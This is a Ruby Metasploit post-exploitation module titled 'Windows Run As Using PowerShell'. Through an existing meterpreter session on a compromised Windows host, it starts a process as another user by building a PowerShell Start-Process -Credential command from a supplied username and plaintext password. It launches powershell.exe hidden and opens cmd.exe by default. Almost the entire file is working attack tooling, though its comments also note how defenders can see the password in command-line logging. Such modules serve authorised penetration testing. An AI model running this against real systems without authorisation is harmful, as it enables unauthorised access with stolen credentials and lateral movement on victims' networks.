##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
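# Post module: spawn a process on the target as a different user by driving
# PowerShell's Start-Process -Credential from the existing meterpreter session.
#
# OPSEC note: the whole script, including the PASS value in clear text, is
# passed on the powershell.exe command line (see the `-c "..."` wrapper in
# #run), so it is visible to command-line auditing (e.g. Security 4688 with
# command-line logging, Sysmon Event ID 1) and to anyone who can list process
# command lines on the host while it runs.
class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Powershell

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Windows 'Run As' Using PowerShell",
        'Description' => %q{ This module will start a process as another user using PowerShell. },
        'License' => MSF_LICENSE,
        'Author' => ['p3nt4'],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_sys_process_execute
            ]
          }
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
    register_options(
      [
        OptString.new('USER', [true, 'User to run executable as', nil]),
        OptString.new('PASS', [true, 'Password of user', nil]),
        OptString.new('DOMAIN', [false, 'Domain of user', '']),
        OptString.new('EXE', [true, 'Executable to run', 'cmd.exe']),
        OptString.new('ARGS', [false, 'Arguments', nil]),
        OptString.new('PATH', [true, 'Working Directory', 'C:\\']),
        OptBool.new('CHANNELIZE', [true, 'Channelize output, required for reading output or interacting', true]),
        OptBool.new('INTERACTIVE', [true, 'Run interactively', true]),
        OptBool.new('HIDDEN', [true, 'Hide the window', true])
      ]
    )
  end

  # Builds the PowerShell one-liner from the datastore options, launches it via
  # powershell.exe on the session, and either hands the channel to the console
  # (INTERACTIVE) or prints whatever the channel yields.
  #
  # Fails with Failure::BadConfig when PowerShell is missing on the target or
  # INTERACTIVE is requested outside a meterpreter console.
  def run
    fail_with(Failure::BadConfig, 'PowerShell is not available') unless have_powershell?

    # Variable Setup
    user = datastore['user']
    pass = datastore['pass']
    domain = datastore['domain']
    # Backslashes in EXE/PATH are doubled before they reach the command line.
    exe = datastore['exe'].gsub('\\', '\\\\\\\\')
    inter = datastore['interactive']
    args = datastore['args']
    path = datastore['path'].gsub('\\', '\\\\\\\\')
    channelized = datastore['channelize']
    hidden = datastore['hidden']

    # A DOMAIN\user value in USER takes precedence over the DOMAIN option.
    if user.include?('\\')
      domain = user.split('\\')[0]
      user = user.split('\\')[1]
    end

    # Interactive mode needs a meterpreter console to attach the channel to;
    # fail cleanly (same style as the PowerShell check) instead of raising a
    # bare RuntimeError with a backtrace.
    if !session.interacting && inter
      print_error('Interactive mode can only be used in a meterpreter console')
      print_error("Use 'run post/windows/manage/run_as_psh USER=x PASS=X EXE=X' or 'SET INTERACTIVE false'")
      fail_with(Failure::BadConfig, 'Invalid console')
    end

    # Prepare powershell script. Every operator-supplied value is placed inside
    # a single-quoted PowerShell string literal, where the only special
    # character is ' itself (written as ''), so each value is quoted with
    # ps_quote. Without this a password or path containing ' breaks the script.
    scr = "$pw = convertto-securestring '#{ps_quote(pass)}' -asplaintext -force; "
    scr << "$pp = new-object -typename System.Management.Automation.PSCredential -argumentlist '#{ps_quote(domain)}\\#{ps_quote(user)}',$pw; "
    scr << "Start-process '#{ps_quote(exe)}' -WorkingDirectory '#{ps_quote(path)}' -Credential $pp"
    if args && args != ''
      scr << " -argumentlist '#{ps_quote(args)}' "
    end

    if hidden
      print_status('Hidden mode may not work on older powershell versions, if it fails, try HIDDEN=false')
      scr << ' -WindowStyle hidden'
    end

    # The script becomes the argument of -c, wrapped in double quotes for the
    # powershell.exe command-line parser. NOTE(review): a literal " inside any
    # option value still terminates that wrapper early; only ' is handled above.
    scr = " -c \"#{scr}\""

    # Execute script. powershell.exe itself is always started hidden; HIDDEN
    # only controls the -WindowStyle of the process Start-Process creates.
    p = client.sys.process.execute(
      'powershell.exe', scr,
      'Channelized' => channelized,
      'Desktop' => false,
      'Session' => false,
      'Hidden' => true,
      'Interactive' => inter,
      'InMemory' => false,
      'UseThreadToken' => false
    )
    print_status("Process #{p.pid} created.")
    print_status("Channel #{p.channel.cid} created.") if p.channel

    # Process output: a channel only exists when CHANNELIZE is true.
    if inter && p.channel
      client.console.interact_with_channel(p.channel)
    elsif p.channel
      data = p.channel.read
      print_line(data) if data
    end
  end

  private

  # Escapes a value for use inside a single-quoted PowerShell string literal:
  # a literal ' is written as ''. nil is treated as the empty string.
  def ps_quote(value)
    value.to_s.gsub("'", "''")
  end
end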